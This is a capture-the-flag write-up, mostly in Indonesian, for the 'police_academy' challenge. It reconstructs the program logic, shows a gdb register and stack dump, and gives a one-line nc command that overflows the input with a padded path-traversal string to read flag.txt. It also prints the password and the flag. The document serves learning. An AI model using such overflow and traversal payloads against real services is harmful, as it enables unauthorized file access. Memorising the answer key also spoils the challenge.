Masalah
Chris is trying out to be a police officer and the applications have just been sent into the police academy. He is really eager to find out about his competition. Help it him back the system and view the other applicant’s applications.
The service is running at 128.199.224.175:13000
Hint! Path Traversals are always a classic.
police_academy b2ccb10e093cc003d5227d9c5e57c009
Penyelesaian
Untuk menyelesaikannya, sebaiknya pahami terlebih dahulu alur program.
void print_record(name){
if(strlen(name)==36){
// ファイルの中身を表示
}
}
int main(){
scanf(%s,&input);
if(strncmp(input,"kaiokenx20")){
scanf(%d,&num);
switch(num){
case [1-6]:
name = [application_name];
case 7:
name = "flag.txt";
printf("権限ないよ");
exit(1);
}
print_record(name);
}
return 0;
}
Program berjalan dengan memeriksa input, apakah diawali dengan password kaiokenx20, jika sudah maka menuju struktur kondisi case dan aksi terakhir adalah fungsi print_record yang meminta input sepanjang 36 karakter. Untuk membuka berkas flag.txt maka bisa dengan melakukan overwrite stack dengan mengisi Input awal dengan kaiokenx20. Kemudian mengisi Input kedua dengan AAAAAA././././././././././././././flag.txt. Huruf A ditambahkan agar nama berkas menjadi ././././././././././././././flag.txt.
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe230 ("././././././././././././././flag.txt")
RBX: 0x0
RCX: 0x0
RDX: 0xc0f801d000000000
RSI: 0x400d98 --> 0x72 ('r')
RDI: 0x7fffffffe230 ("././././././././././././././flag.txt")
RBP: 0x7fffffffe200 --> 0x7fffffffe260 --> 0x400d10 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffdeb0 --> 0x7fffffffdf44 --> 0x0
RIP: 0x4008db (<print_record+85>: mov rdi,rax)
R8 : 0x1d0
R9 : 0x7ffff7fcb700 (0x00007ffff7fcb700)
R10: 0x309
R11: 0x7ffff7a98720 (<strlen>: pxor xmm0,xmm0)
R12: 0x400790 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe340 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x4008ca <print_record+68>: jmp 0x400985 <print_record+255>
0x4008cf <print_record+73>: mov rax,QWORD PTR [rbp-0x348]
0x4008d6 <print_record+80>: mov esi,0x400d98
=> 0x4008db <print_record+85>: mov rdi,rax
0x4008de <print_record+88>: call 0x400750 <fopen@plt>
0x4008e3 <print_record+93>: mov QWORD PTR [rbp-0x338],rax
0x4008ea <print_record+100>: cmp QWORD PTR [rbp-0x338],0x0
0x4008f2 <print_record+108>: jne 0x4008fe <print_record+120>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdeb0 --> 0x7fffffffdf44 --> 0x0
0008| 0x7fffffffdeb8 --> 0x7fffffffe230 ("././././././././././././././flag.txt")
0016| 0x7fffffffdec0 --> 0x24ffffe010
0024| 0x7fffffffdec8 --> 0x40045c --> 0x735f5f0073747570 ('puts')
0032| 0x7fffffffded0 --> 0x4002f0 --> 0x1200000034
0040| 0x7fffffffded8 --> 0x7fffffffdf48 --> 0x0
0048| 0x7fffffffdee0 --> 0x7c9c7b11
0056| 0x7fffffffdee8 --> 0x1f271ec
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x00000000004008db in print_record ()
Sehingga solusinya menjadi seperti ini:
$ echo kaiokenx20AAAAAA././././././././././././././flag.txt | nc 128.199.224.175 13000
Enter password to authentic yourself : Enter case number:
1) Application_1
2) Application_2
3) Application_3
4) Application_4
5) Application_5
6) Application_6
7) Flag
Enter choice :-
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
The flag is :- pctf{bUff3r-0v3Rfl0wS`4r3.alw4ys-4_cl4SsiC}
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX